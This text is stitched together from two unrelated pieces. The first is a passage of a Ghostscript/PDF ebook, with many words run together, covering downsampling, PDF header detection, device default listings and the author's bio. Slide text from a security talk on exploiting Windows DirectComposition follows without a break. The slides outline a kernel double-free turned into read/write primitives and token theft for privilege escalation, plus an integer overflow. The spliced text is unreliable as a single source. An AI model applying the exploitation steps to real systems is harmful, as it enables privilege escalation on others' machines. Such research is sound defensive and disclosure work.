20 -dColorImageDownsampleThreshold=1.0 \
21 600ppi-color.pdf
As you can see from the various command line parameters, you could differentiate between color,
grayscale as well as mono images and give different parameters for each type. Above I used the same
onesforeach.
Three parameters which deserve special mention here are the {Mono,Gray,Color}DownsampleThreshold
ones.Theirdefaultvalueis 1.5.Thismeansthatdownsamplingwillonlyhappen,iftheoriginal’simage
resolution is 1.5 times as high or higher than the target image’s resolution. If you have an image of 250
ppi embedded in a PDF page its resolution will remain unchanged for a 150 ppi target. Images will only
bedownsamplediftheyareat225ppiorabove.Settingthe {Mono,Gray,Color}DownsampleThreshold sto
HowcanIconvertacolorPDFintograyscale? 45
1.0enforcesthedownsamplingofeachandeveryimagethathasahigherresolutionthanthetarget.
VUsing pdfmarks
12How can I use pdfmark to insert
bookmarks into PDF? (CONTENT STILL
MISSING)
47
VIText extraction
13How can I extract text from PDF?
(CONTENT STILL MISSING)
49
VIIMiscellaneous
14How to recognize PDF format?
..Givenastreamofbytes,howcanItellifthisstreamcontainsaPDFdocumentorsomethingelse?
Iamusing.NETandC#butitdoesnotmatter.
14.1 Answer
Italldependsofhowwell/reliableyouwantthedetectionworking.
Heremyselectionofmostimportantbits+piecesfromthe756pagelongofficialdefinition,straightfrom
thehorse’smouth( PDF32000:1-2008 1):
A basic conforming PDF file shall be constructed of following four elements (see Figure 2):
•A one-line header identifying the version of the PDF specification to which the file
conforms
•A body containing the objects that make up the document contained in the file
•A cross-reference table containing information about the indirect objects in the file
•A trailer giving the location of the cross-reference table and of certain special objects
within the body of the file
[....]
The first line of a PDF file shall be a header consisting of the 5 characters %PDF– followed by
a version number of the form 1.N, where N is a digit between 0 and 7. A conforming reader
shallacceptfileswithanyofthefollowingheaders:*
%PDF-1.0
%PDF-1.1
%PDF-1.2
%PDF-1.3
%PDF-1.4
%PDF-1.5
%PDF-1.6
%PDF-1.7
[...]
If a PDF file contains binary data, as most do (see 7.2, “Lexical Conventions”), the header line
shall be immediately followed by a comment line containing at least four binary characters—
that is, characters whose codes are 128 or greater. This ensures proper behaviour of file transfer
applications that inspect data near the beginning of a file to determine whether to treat the
file’s contents as text or as binary.
1http://www.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/PDF32000_2008.pdf#page46
51
HowtorecognizePDFformat? 52
Trailer
[....] The last line of the file shall contain only the end-of-file marker, %%EOF. The two
preceding lines shall contain, one per line and in order, the keyword startxref and the byte
offset in the decoded stream from the beginning of the file to the beginning of the xref keyword
in the last cross-reference section.
Summary
Twoofthemostimportantthingstoremember:
(a)Thefirst‘headerline’
1 %PDF-1.X
[whereXin0..7]mustappearonalineofitsownbefollowedbyanewline.Thislinemustappearwithin
the first 4096 Bytes, not necessarily on the very first line. The preceding lines may contain non-PDF
content,but printer job languange commands (PJL)orcomments.
(b)TheverynextlinemustbefourbinarybytesifthePDFcontainsbinarydata.
Just parsing for ‘%PDF-1.’, relying on this and not looking for anything else, has bitten a lot of people
already....
VIIISome Topics in Depth
15Can I query the default settings
Ghostscript uses for an output device
(such as ‘pdfwrite’ or ‘tiffg4’)?
..Inthisanswerto‘GhostscriptcommandlineparameterstoconvertEPStoPDF’ ;itisstatedthat
the default resolution for the pdfwritedevice of Ghostscript is 720x720, which I initially found
unbelievable!
IsthereawaytolistthedefaultoptionsofaGhostscriptdevice?
http://stackoverflow.com/a/3461186/277826
15.1 Answer
SinceGhostscriptisafull-blownPostScriptinterpreter,youcanalsosendPostScriptsnippetstoitwhich
donotcausethedrawingofpageelements,butwhichqueryitforitsinternalstate.
Ifyouwanttoknowwhatthedefaultsettingsofthe Displayare,whenyouaskitvia gs some.pdf tojust
displayaPDFonscreen,youcouldtrythis:
Sample command line (Linux, Unix, Mac OS X):
..1gs \
2 -c "currentpagedevice {exch ==only ( ) print == } forall"
On Windows this becomes:
..1gswin32c.exe ^
2 -c "currentpagedevice {exch ==only ( ) print == } forall"
Theresultisalistof /SomeName somevalue pairswhichdescribethesettingsusedforrenderingpagesto
thecurrentscreen.
54
CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’or‘tiffg4’)? 55
ThisissobecauseusuallythedisplayisthedefaultdeviceforGhostscripttosenditsoutputto.Nowyou
may notice that you’ll see an empty Ghostscript window pop up, which you’ll have to close.... Ah, how
aboutaddingsomeoptionstoavoidthepopupwindow?
..1gs \
2 -o /dev/null \
3 -dNODISPLAY \
4 -c "currentpagedevice {exch ==only ( ) print == } forall"
Or,onWindows:
..1gswin32c.exe ^
2 -o nul ^
3 -dNODISPLAY ^
4 -c "currentpagedevice {exch ==only ( ) print == } forall"
But this will change the query return values, because you (unintentionally) changed the output device
settings:
..1gs -c "currentpagedevice {exch ==only ( ) print == } forall" | grep Resolution
Result:
..1HWResolution [86.5426483 86.5426483]
2/.MarginsHWResolution [1152.0 1152.0]
Comparethisto
..1gs \
2 -o /dev/null \
3 -dNODISPLAY \
4 -c "currentpagedevice {exch ==only ( ) print == } forall" \
5| grep Resolution
CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’or‘tiffg4’)? 56
Result:
..1/HWResolution [72.0 72.0]
2/.MarginsHWResolution [72.0 72.0]
So, please avoid this trap. I successfully fell into it a few years ago, and didn’t even notice it for quite a
longtime...
NowassumingyouwanttoqueryforthedefaultsettingsofthePDFwritingdevice,runthisone:
..1gs \
2 -o /dev/null \
3 -sDEVICE=pdfwrite \
4 -c "currentpagedevice {exch ==only ( ) print == } forall" \
5| tee ghostscript-pdfwrite-default-pagedevice-settings.txt
You’ll now have all settings for the pdfwrite device in a *.txt file. And you may repeat that with some
otherinterestingGhostscriptdevicesandthencomparethemforalltheirdetailleddifferences:
..1for _dev in \
2 pswrite ps2write pdfwrite \
3 tiffg3 tiffg4 tiff12nc tiff24nc tiff32nc tiff48nc tiffsep \
4 jpeg jpeggray jpegcmyk \
5 png16 png16m png256 png48 pngalpha pnggray pngmono; \
6do \
7 gs \
8 -o /dev/null \
9 -sDEVICE=${_dev} \
10 -c "currentpagedevice {exch ==only ( ) print == } forall" \
11 | sort \
12 | tee ghostscript-${_dev}-default-pagedevice-settings.txt; \
13 done
It’sratherinterestingtocomparethesettingsfor,say,the pswriteandps2writedeviceslikethis(andalso
discoverparameterswhichareavailablefortheone,butnottheotherdevice).Onemethodthatgivesyou
aquickoverviewistoapplythecommandlinetool sdifftothetwotextfiles:
..1sdiff -sbB ghostscript-ps{2,}write-default-pagedevice-settings.txt
CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’or‘tiffg4’)? 57
On my Mac OS X system, this yields the followingresult (left column: ps2write, right column: pswrite
output):
..1/AllowIncrementalCFF false <
2/AllowPSRepeatFunctions true <
3/AutoFilterColorImages true | /AutoFilterColorImages false
4/AutoFilterGrayImages true | /AutoFilterGrayImages false
5/AutoPositionEPSFiles true <
6/CalCMYKProfile (None) | /CalCMYKProfile ()
7/CalGrayProfile (None) | /CalGrayProfile ()
8/CalRGBProfile (None) | /CalRGBProfile ()
9/CannotEmbedFontPolicy /Error | /CannotEmbedFontPolicy /Warning
10 /CenterPages false <
11 /ColorImageDownsampleType /Bicubic | /ColorImageDownsampleType /Subsample
12 /ColorImageResolution 600 | /ColorImageResolution 150
13 /CompatibilityLevel 1.2 <
14 /CompressEntireFile false <
15 /CompressFonts true <
16 /CoreDistVersion 5000 <
17 /CreateJobTicket false <
18 /DSCEncodingToUnicode [] <
19 /DetectDuplicateImages true <
20 /DoNumCopies false <
21 /DocumentTimeSeq 0 <
22 /DocumentUUID () <
23 /DownsampleColorImages true | /DownsampleColorImages false
24 /DownsampleGrayImages true | /DownsampleGrayImages false
25 /DownsampleMonoImages true | /DownsampleMonoImages false
26 /EmitDSCWarnings false <
27 /EncryptionR 0 <
28 /FirstObjectNumber 1 <
29 /FitPages false <
30 /GrayImageDownsampleType /Bicubic | /GrayImageDownsampleType /Subsample
31 /GrayImageResolution 600 | /GrayImageResolution 150
32 /HaveCIDSystem false <
33 /HaveTransparency true <
34 /HaveTrueTypes true <
35 /HighLevelDevice true <
36 /ImageMemory 524288 | /ImageMemory 500000
37 /InstanceUUID () <
38 /IsDistiller true <
39 /KeyLength 0 <
40 > /LanguageLevel 2.0
41 /MaxClipPathSize 12000 <
42 /MaxInlineImageSize -1 <
43 /MaxShadingBitmapSize 256000 <
44 /MaxViewerMemorySize -1 <
45 /MonoImageDownsampleThreshold 1.5 | /MonoImageDownsampleThreshold 2.0
46 /MonoImageDownsampleType /Bicubic | /MonoImageDownsampleType /Subsample
47 /MonoImageResolution 1200 | /MonoImageResolution 300
48 /Name (ps2write) | /Name (pswrite)
49 /NoEncrypt () <
CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’or‘tiffg4’)? 58
..50 /OffOptimizations 0 <
51 /Optimize true <
52 /OutputDevice /ps2write | /OutputDevice /pswrite
53 /OwnerPassword () <
54 /PDFA false <
55 /PDFACompatibilityPolicy 0 <
56 /PDFEndPage -1 <
57 /PDFStartPage 1 <
58 /PDFX false <
59 /PDFXBleedBoxToTrimBoxOffset [0.0 0.0 0.0 0.0]<
60 /PDFXSetBleedBoxToMediaBox true <
61 /PDFXTrimBoxToMediaBoxOffset [0.0 0.0 0.0 0.0]<
62 /ParseDSCComments true <
63 /ParseDSCCommentsForDocInfo true <
64 /PatternImagemask false <
65 /Permissions -4 <
66 /PreserveCopyPage true <
67 /PreserveDeviceN true <
68 /PreserveEPSInfo true <
69 /PreserveHalftoneInfo true | /PreserveHalftoneInfo false
70 /PreserveOPIComments true | /PreserveOPIComments false
71 /PreserveOverprintSettings true | /PreserveOverprintSettings false
72 /PreserveSMask false <
73 /PreserveSeparation true <
74 /PreserveTrMode false <
75 /PrintStatistics false <
76 /ProduceDSC true <
77 /ReAssignCharacters true <
78 /ReEncodeCharacters true <
79 /RotatePages false <
80 /SetPageSize false <
81 /UCRandBGInfo /Preserve | /UCRandBGInfo /Remove
82 /UsePrologue false <
83 /UserPassword () <
84 /WantsToUnicode false <
85 /sRGBProfile (None) | /sRGBProfile ()
Howtointerpretthisoutput?
•Lineswithparamkeyentriesonbothhalvesindicate:thereisthesamekeyavailableforbothoutput
devices,buteachoneusesadifferentdefaultvalue.
•Lines with an entry for one half only indicate: this parameter key is unknown to the other output
device.
Oneexampleisthe /GrayImageResolution key: ps2writehasthissetto 600bydefaultwhereas pswrite
uses 150. Another example is /LanguageLevel :ps2write has set it to 2.0, while pswritedoesn’t know
about this setting. (It produces PostScript language level 1 only). The third example is /CompressFonts :
ps2write will compress fonts by default. (You could override this, by specifying a different behavior on
thecommandlineandforceuncompressedfontsinthePostScriptoutput.) pswritedoesnotsupportthis
settingatall.
CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’or‘tiffg4’)? 59
15.2 Update
As you may imagine this is also a great way to compaare different Ghostscript versions, and track how
defaultsettingsmayhavechangedfordifferentdevicesinrecentreleases.Thisisespeciallyinterestingif
youwanttofindoutaboutallthenewlyimplementedcolorprofileandICCsupportwhichisnowpresent
inGhostscript.
Also, to avoid the return of just -dict-for certain key values, use the ===instead of ==macro. ===acts
like==butalsoprintsthe contentofdictionaries.
Sohereistheexampleoutputforthe pdfwritedevice.Remember,Ghostscript’s pdfwritedeviceismeant
to provide mostly the same functionality as Adobe Acrobat Distiller (with the additional feature that it
does not only accept PostScript as input, but also PDFs, so you can sort of redistillexisting PDF files in
ordertorepair,improveorotherwisemanipulatethem).Therefore,Ghostscript’s pdfdevice honorsmost
of the setdistillerparams operator which the original Distiller also supports. This is the command to
use:
..1gs \
2 -o /dev/null \
3 -sDEVICE=pdfwrite \
4 -c "currentpagedevice {exch ==only ( ) print === } forall" \
5| sort
On my system, this produces the following output. I include it here in full, because this book will also
serveasmypersonallookupreferenceforcertaininfo–inthisisoneIdoneedquitefrequently:
..1/%MediaDestination 0
2/%MediaSource 0
3/.AlwaysEmbed []
4/.HWMargins [0.0 0.0 0.0 0.0]
5/.IgnoreNumCopies false
6/.LockSafetyParams false
7/.MarginsHWResolution [720.0 720.0]
8/.MediaSize [612.0 792.0]
9/.NeverEmbed [ \
10 /Courier /Courier-Bold /Courier-Oblique /Courier-BoldOblique \
11 /Helvetica /Helvetica-Bold /Helvetica-Oblique /Helvetica-BoldOblique \
12 /Times-Roman \
13 /Times-Bold /Times-Italic /Times-BoldItalic \
14 /Symbol /ZapfDingbats \
15 ]
16 /ASCII85EncodePages false
17 /AllowIncrementalCFF false
18 /AllowPSRepeatFunctions false
19 /AlwaysEmbed []
CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’or‘tiffg4’)? 60
..20 /AntiAliasColorImages false [*]
21 /AntiAliasGrayImages false [*]
22 /AntiAliasMonoImages false [*]
23 /AutoFilterColorImages true
24 /AutoFilterGrayImages true
25 /AutoPositionEPSFiles true
26 /AutoRotatePages /PageByPage
27 /BeginPage {--.callbeginpage--}
28 /Binding /Left [*]
29 /BitsPerPixel 24
30 /BlueValues 256
31 /CalCMYKProfile (None) [*]
32 /CalGrayProfile (None) [*]
33 /CalRGBProfile (None) [*]
34 /CannotEmbedFontPolicy /Warning [*]
35 /CenterPages false
36 /ColorACSImageDict << /Blend 1 /VSamples [2 1 1 2] /QFactor 0.9 /HSamples [2 1 1 2] >>
37 /ColorConversionStrategy /LeaveColorUnchanged
38 /ColorImageDepth -1
39 /ColorImageDict << /Blend 1 /VSamples [2 1 1 2] /QFactor 0.9 /HSamples [2 1 1 2] >>
40 /ColorImageDownsampleThreshold 1.5
41 /ColorImageDownsampleType /Subsample
42 /ColorImageFilter /DCTEncode
43 /ColorImageResolution 150
44 /ColorValues 16777216
45 /Colors 3
46 /CompatibilityLevel 1.4
47 /CompressEntireFile false
48 /CompressFonts true
49 /CompressPages true
50 /ConvertCMYKImagesToRGB false
51 /ConvertImagesToIndexed true
52 /CoreDistVersion 5000
53 /CreateJobTicket false [*]
54 /DSCEncodingToUnicode []
55 /DefaultRenderingIntent /Default
56 /DetectBlends true [*]
57 /DetectDuplicateImages true
58 /DeviceGrayToK true
59 /DeviceLinkProfile ()
60 /DoNumCopies false
61 /DoThumbnails false [*]
62 /DocumentTimeSeq 0
63 /DocumentUUID ()
64 /DownsampleColorImages false
65 /DownsampleGrayImages false
66 /DownsampleMonoImages false
67 /EmbedAllFonts true
68 /EmitDSCWarnings false [*]
69 /EncodeColorImages true
70 /EncodeGrayImages true
71 /EncodeMonoImages true
72 /EncryptionR 0
73 /EndPage {--.callendpage--} [*]
CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’or‘tiffg4’)? 61
..74 /FirstObjectNumber 1
75 /FitPages false
76 /ForOPDFRead false
77 /GraphicICCProfile ()
78 /GraphicIntent 0
79 /GraphicsAlphaBits 1
80 /GrayACSImageDict << /Blend 1 /VSamples [2 1 1 2] /QFactor 0.9 /HSamples [2 1 1 2] >>
81 /GrayImageDepth -1
82 /GrayImageDict << /Blend 1 /VSamples [2 1 1 2] /QFactor 0.9 /HSamples [2 1 1 2] >>
83 /GrayImageDownsampleThreshold 1.5
84 /GrayImageDownsampleType /Subsample
85 /GrayImageFilter /DCTEncode
86 /GrayImageResolution 150
87 /GrayValues 256
88 /GreenValues 256
89 /HWResolution [720.0 720.0]
90 /HWSize [6120 7920]
91 /HaveCIDSystem false
92 /HaveTransparency true
93 /HaveTrueTypes true
94 /HighLevelDevice true
95 /ImageICCProfile ()
96 /ImageIntent 0
97 /ImageMemory 524288 [*]
98 /ImagingBBox null
99 /InputAttributes << \
100 0 << /PageSize [612.0 792.0] >> \
101 1 << /PageSize [ 792 1224] >> \
102 2 << /PageSize [ 612 792] >> \
103 3 << /PageSize [ 792 1224] >> \
104 4 << /PageSize [1224 1585] >> \
105 5 << /PageSize [1585 2448] >> \
106 6 << /PageSize [2448 3168] >> \
107 7 << /PageSize [2016 2880] >> \
108 8 << /PageSize [2384 3370] >> \
109 9 << /PageSize [1684 2384] >> \
110 10 << /PageSize [ 73 105] >> \
111 11 << /PageSize [1191 1684] >> \
112 12 << /PageSize [ 842 1191] >> \
113 13 << /PageSize [ 595 842] >> \
114 14 << /PageSize [ 595 842] >> \
115 15 << /PageSize [ 420 595] >> \
116 16 << /PageSize [ 297 420] >> \
117 17 << /PageSize [ 210 297] >> \
118 18 << /PageSize [ 148 210] >> \
119 19 << /PageSize [ 105 148] >> \
120 20 << /PageSize [ 648 864] >> \
121 21 << /PageSize [ 864 1296] >> \
122 22 << /PageSize [1296 1728] >> \
123 23 << /PageSize [1728 2592] >> \
124 24 << /PageSize [2592 3456] >> \
125 25 << /PageSize [2835 4008] >> \
126 26 << /PageSize [2004 2835] >> \
127 27 << /PageSize [1417 2004] >> \
CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’or‘tiffg4’)? 62
..128 28 << /PageSize [1001 1417] >> \
129 29 << /PageSize [ 709 1001] >> \
130 30 << /PageSize [ 499 709] >> \
131 31 << /PageSize [ 354 499] >> \
132 32 << /PageSize [2599 3677] >> \
133 33 << /PageSize [1837 2599] >> \
134 34 << /PageSize [1298 1837] >> \
135 35 << /PageSize [ 918 1298] >> \
136 36 << /PageSize [ 649 918] >> \
137 37 << /PageSize [ 459 649] >> \
138 38 << /PageSize [ 323 459] >> \
139 39 << /PageSize [ 612 936] >> \
140 40 << /PageSize [ 612 936] >> \
141 41 << /PageSize [ 283 420] >> \
142 42 << /PageSize [ 396 612] >> \
143 43 << /PageSize [2835 4008] >> \
144 44 << /PageSize [2004 2835] >> \
145 45 << /PageSize [1417 2004] >> \
146 46 << /PageSize [1001 1417] >> \
147 47 << /PageSize [ 709 1001] >> \
148 48 << /PageSize [ 499 709] >> \
149 49 << /PageSize [ 354 499] >> \
150 50 << /PageSize [2920 4127] >> \
151 51 << /PageSize [2064 2920] >> \
152 52 << /PageSize [1460 2064] >> \
153 53 << /PageSize [1032 1460] >> \
154 54 << /PageSize [ 729 1032] >> \
155 55 << /PageSize [ 516 729] >> \
156 56 << /PageSize [ 363 516] >> \
157 57 << /PageSize [1224 792] >> \
158 58 << /PageSize [ 612 1008] >> \
159 59 << /PageSize [ 612 792] >> \
160 60 << /PageSize [ 612 792] >> \
161 61 << /PageSize [ 612 792] >> \
162 62 << /PageSize [ 595 792] >> \
163 63 << /PageSize [ 792 1224] >> \
164 64 << /PageSize [0 0 524287 524287] >> \
165 >>
166 /Install {--.callinstall--}
167 /InstanceUUID ()
168 /IsDistiller true
169 /KeyLength 0
170 /LZWEncodePages false
171 /Margins [0.0 0.0]
172 /MaxClipPathSize 12000
173 /MaxInlineImageSize 4000
174 /MaxPatternBitmap 0
175 /MaxSeparations 3
176 /MaxShadingBitmapSize 256000
177 /MaxSubsetPct 100
178 /MaxViewerMemorySize -1
179 /MonoImageDepth -1
180 /MonoImageDict << /K -1 >>
181 /MonoImageDownsampleThreshold 1.5
CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’or‘tiffg4’)? 63
..182 /MonoImageDownsampleType /Subsample
183 /MonoImageFilter /CCITTFaxEncode
184 /MonoImageResolution 300
185 /Name (pdfwrite)
186 /NeverEmbed [ \
187 /Courier /Courier-Bold /Courier-Oblique /Courier-BoldOblique \
188 /Helvetica /Helvetica-Bold /Helvetica-Oblique /Helvetica-BoldOblique \
189 /Times-Roman /Times-Bold /Times-Italic /Times-BoldItalic \
190 /Symbol /ZapfDingbats \
191 ]
192 /NoEncrypt ()
193 /NoT3CCITT false
194 /NumCopies null
195 /OPM 1
196 /OffOptimizations 0
197 /Optimize false [*]
198 /OutputAttributes << 0 << >> >>
199 /OutputDevice /pdfwrite
200 /OutputFile (/dev/null)
201 /OutputICCProfile (default_rgb.icc)
202 /OwnerPassword ()
203 /PDFA 0
204 /PDFACompatibilityPolicy 0
205 /PDFEndPage -1
206 /PDFStartPage 1
207 /PDFX false
208 /PDFXBleedBoxToTrimBoxOffset [0.0 0.0 0.0 0.0]
209 /PDFXSetBleedBoxToMediaBox true
210 /PDFXTrimBoxToMediaBoxOffset [0.0 0.0 0.0 0.0]
211 /PageCount 0
212 /PageDeviceName null
213 /PageOffset [0 0]
214 /PageSize [612.0 792.0]
215 /ParseDSCComments true
216 /ParseDSCCommentsForDocInfo true
217 /PatternImagemask false
218 /Permissions -4
219 /Policies << \
220 /PolicyReport \
221 {--dup-- /.LockSafetyParams --known-- \
222 {/setpagedevice --.systemvar-- /invalidaccess signalerror} \
223 --if-- --pop-- \
224 } \
225 /PageSize 0 \
226 /PolicyNotFound 1 \
227 >>
228 /PreserveCopyPage true [*]
229 /PreserveDeviceN true
230 /PreserveEPSInfo true [*]
231 /PreserveHalftoneInfo false [*]
232 /PreserveOPIComments true [*]
233 /PreserveOverprintSettings true
234 /PreserveSMask true
235 /PreserveSeparation true
CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’or‘tiffg4’)? 64
..236 /PreserveTrMode true
237 /PrintStatistics false
238 /ProcessColorModel /DeviceRGB
239 /ProduceDSC true
240 /ProofProfile ()
241 /ReAssignCharacters true
242 /ReEncodeCharacters true
243 /RedValues 256
244 /RenderIntent 0
245 /RotatePages false
246 /SeparationColorNames []
247 /Separations false
248 /SetPageSize false
249 /SubsetFonts true
250 /TextAlphaBits 1
251 /TextICCProfile ()
252 /TextIntent 0
253 /TransferFunctionInfo /Preserve
254 /UCRandBGInfo /Preserve
255 /UseCIEColor false
256 /UseFastColor false
257 /UseFlateCompression true
258 /UsePrologue false [*]
259 /UserPassword ()
260 /WantsToUnicode true
261 /sRGBProfile (None) [*]
[*]Notesabouttheabovelists:
According to the official Ghostscript documentation, the following settings (which are
supported by Adobe Acrobat Distiller) currently on Ghostscript can be set and queried, but
setting them does have no effect:
..1/AntiAliasColorImages
2/AntiAliasGrayImages
3/AntiAliasMonoImages
4/AutoPositionEPSFiles
5/Binding
6/CalCMYKProfile
7/CalGrayProfile
8/CalRGBKProfile
9/CannotEmbedFontPolicy
10 /ConvertImagesToIndexed
11 /CreateJobTicket
12 /DetectBlends
13 /DoThumbnails
14 /EmitDSCWarnings
15 /EndPage
16 /ImageMemory
CanIquerythedefaultsettingsGhostscriptusesforanoutputdevice(suchas‘pdfwrite’or‘tiffg4’)? 65
..17 /LockDistillerParams
18 /Optimize
19 /PreserveCopyPage
20 /PreserveEPSInfo
21 /PreserveHalftoneInfo
22 /PreserveOPIComments
23 /sRGBProfile
24 /StartPage
25 /UsePrologue
Youmayalsowanttoreadthechapterexplainingthe purposeofGhostscriptdictionaries .
Appendix
About the Author
Kurthasbeencoined The Walking PDF Debugger byseveralofhisregularclients.Theyareright.Many
ofhisproblemsolvingskillsinthelast10yearsinvolvedtroubleshootingPDFprocessingsystemsinthe
PrintingandPrepressIndustry.
Kurt is a professional with more than 20 years of experience in the industry. After working for nearly 3
decadeswiththesameemployer(whointheprocesshad4differentnamesduetocompanymergers)he
decidedtofreelance.
Whenworkingwithcustomers,hepreferstouseFreeandOpenSourceSoftwarewhereeveritworksbest.
He is a commandline addict. As operating systems he prefers unix-oid types like Linux, Mac OS X and
Solaris, but he is just as familiar with Windows and its cmd.exetoo. These preferences were not pre-
determined from the start: up until 1998 he used Windows 95 exclusively. His first tentative adventures
withLinuxstartedinthatveryyear.In1999,stillverymuchanewbiewithOpenSource,hebecameone
thefirstusersandbetatestersofanewprintingsubsystemcalledCUPS(CommonUnixPrintingSystem).
Inthefollowingyears,CUPSveryfastbecamethepre-dominantprintinginterfaceintheLinuxandUnix
worldandhasmeanwhilebeenadoptedandevenacquiredbyAppleforMacOSX.
Kurt’s “career” as an author of technical documentation started when he helped users with technical
questions about printing in different internet forums and contributed written documentation to various
FOSSprojects,suchasSamba,Linuxprinting.organdKDE.
Hecurrentlyistheall-timetopscoreronStackOverflow.comwhenitcomestosomeofhisfavoritetopics:
•Hisanswerstaggedas“ [pdf]1”–Score, current2
•Hisanswerstaggedas“ [ghostscript] 3”–Score, current4
•Hisanswerstaggedas“ [imagemagick] 5”–Score, current6
Kurtisavailableforcontractwork:
•Kurt’sLinkedInProfile 7
•Kurt’sXingProfile 8
1http://stackoverflow.com/search?tab=votes&q=user%3a359307%20%5bpdf%5d
2http://stackoverflow.com/tags/pdf/topusers
3http://stackoverflow.com/search?tab=votes&q=user%3a359307%20%5bghostscript%5d
4http://stackoverflow.com/tags/ghostscript/topusers
5http://stackoverflow.com/search?tab=votes&q=user%3a359307%20%5bimagematick%5d
6http://stackoverflow.com/tags/imagemagick/topusers
7https://de.linkedin.com/pub/kurt-pfeifle/0/95/2a2
8https://www.xing.com/profile/Kurt_Pfeifle
67
Acknowledgements
Thisbookwouldnotexistwithoutmycustomers.Theyweretheoneswhoconfrontedmewithproblems,
tasksandjobsthatmademethinkofpossiblesolutionsandmademeresearchstuff.
Also, it would not exist without the wonderful StackExchange 9andStackoverflow 10platforms which
drawstogetherusersandprogrammers,expertsandinterestedpeoplewhoaskquestions,sharesolutions
anddiscussideas.
Contributors
Anumberofpeoplehavesentmesuggestionsandcorrections.Iliketothankthemall:
•MarkusWolf
•AdrianPfeifle
•...(your name could be here if you notified me of anything you want to be improved, added or
corrected in future releases of this book!)
Images
ThiseBookusessomeimageswhichwerenotcreatedbymyself.Hereisalist:
•Chapter“How can I convert a color PDF into grayscale?” :The picture used in the demo PDF
document for this chapter was made by Craig ONeal (“minds-eye”) who hosts some of his work
atFlickr11.Thispictureislicensedunder “Creative Commons Atrributions 2.0 Generic” (attention!,
notallofCraig’spicturesusethislicense!).Idownloadeditfrom Wikimedia.org 12–Seealso here13.
9http://www.stackexchange.com/
10http://www.stackoverflow.com/
11http://www.flickr.com/photos/craigoneal/
12http://upload.wikimedia.org/wikipedia/commons/thumb/e/e9/HDR_Savannah.jpg/1280px-HDR_Savannah.jpg
13http://commons.wikimedia.org/wiki/File:HDR_Savannah.jpg
68Win32k Dark Composition Attacking the Shadow Part of Graphic Subsystem 
@360Vulcan Team Peng	Qiu	(@pgboy)	SheFang	Zhong	(@zhong_sf)	
About US Member of 360 vulcan team. Windows kernel security researcher Pwn2Own winners 2016 .pwned Chrome pwn2own 2016 .pwned Flash pwn2own 2016 Pwnfest winners 2016 .pwned Edge PwnFest 2016 .pwned Flash PwnFest 2016 Pwn2Own winners 2015 .pwned IE pwn2own 2015 

	
Agdenda Direct Composition Overview	0day & Exploitation	Fuzzing	Mitigation & Bypass	
• High-performance bitmap composition with transforms, effects and animations graphic engine • Introduced from windows 8. • Working based on dwm(desktop windows manager). 
Direct Composition Overview 
Direction Composition Architecture dwmcore	dcomp	.	.	.	userland	kernel	DirectComposiAon	CApplicaAonChannel	visual	CExpressionMarshaler	CFilterEffectMarshaler	CScaleTransformMarshaler	.	.	.	submit DWM (desktop windows manager) DXGK (directX graphic kernel) call 
Significant Change since win10 RS1 • kernel	implement	changed	• Interface	changed	Remove	lots	of	interface.	10+?	Lots	of	funcAon	has	been	rewrite,	not	fix	vuln	Add		some	interface.	eg:	

Before	win10	RS1	Exist	independently	and	some	in	the	win32k	filter	table	Since	win10	RS1	all included in This	func1on	is	out	of	Win32k	filter	list


Why attack DirectComposition • Reachable	in	AppContainer	and	out	of	win32k	filter	• This	part	implement	with	c++	in	kernel			• Introduced	from	windows	8,	ever	been	focus	by	another	researchers,	!!!as	far	as	we	know!!!	
Important functions 

Channel Object 
• know	as	Device	Object	in	user	interface	• owner	of	resource,	use	to	create	resource	• pArgSec(onBaseMapInProcess	return	a	batch	buffer	we	need	later	
Resource Object • know	as	visual	in	user	interface	• similar	to	win32k	surface		• It	has	a	lots	of	types.	
CScaleTransformMarshaler	CTranslateTransformMarshaler	CRectangleClipMarshaler	CBaseClipMarshaler	CSharedSecAonMarshaler	CMatrixTransformMarshaler	CMatrixTransform3DMarshaler	CShadowEffectMarshaler	. . . 

Batch Buffer 	• Associate	with	a	channel	 • Returned	from	NtDComposiAonCreateChannel		• NtDComposiAonProcessChannelBatchBuffer	parse	it • This	funcAon	support	a	lot	of	commands	


How to fuzz 

By	default	is	1,	we	increase	those	funcAon’s	probability	to	100.

• They	need	a	channel	we	give	them	one.	• They	need	a	resource	we	give	them	one.	• If	we	do	not	known	what	they	want,	give	them	a	random	one.	

	
0day & Exploition 
Resource Double free (CVE-2017-XXXX) 

Root Cause Free the resource(visual)'s property buffer forget to clear resource->Databuffer. result in free again when resource is free First time free 


Second time free 

Exploition Res1 First time free ResY Free this one Res2 Res3 Res4 ... Res1 palette Occupy with palette Res2 Res3 Res4 ... Res1 palette Free palette Res2 Res3 Res4 ... Second time free Res1 ResX Occupy with ResX Res2 Res3 Res4 ... 
Modify the palette->pEntries to what you want when occupy palette with a ResourceBuffer palette pEntries ResX->DataBuf xxxxx occupy second time Content Replace 
palette pEntries bitmap pScan0 Usually, cover palette1->pEntries to a bitmap address  
Read	&	Write	primity  
Replace	process	token,	exploited	

Fix BSOD • We finished privilege escalation, but BSOD when process exit  • There still has double either Palette or ResX's DataBuffer, because they share the same kernel buffer  • Double free happened in clear process handle table when process exit • Close palette handle first, Resource handle next • So? must clear ResX->DataBuffer or remove ResX handle from handle table before process exit 
Clear ResX->DataBuffer 
• It's a binary tree struct, search the binary tree to find the channel that Resource belongs to. • Channel handle table locate in: _EPROCESS->Win32Process->GenericTable  GenericTable  channel1 channel2 channel3 channel4 channel5 1. Locate ResX address 2. Locate channel address Resource address store in channel's resource table 
Resource table in channel implement as a array 
void*	ptrNull=0;	AddressWrite(&ResX->DataBuffer,	sizeof(void*),	&ptrNull);	Clear 

BagMarshaler Integer overflow (CVE-2016-XXXX) 

Root cause Integer overflow while dataOffset < DataSize-0xc if DataSize < 0xc 
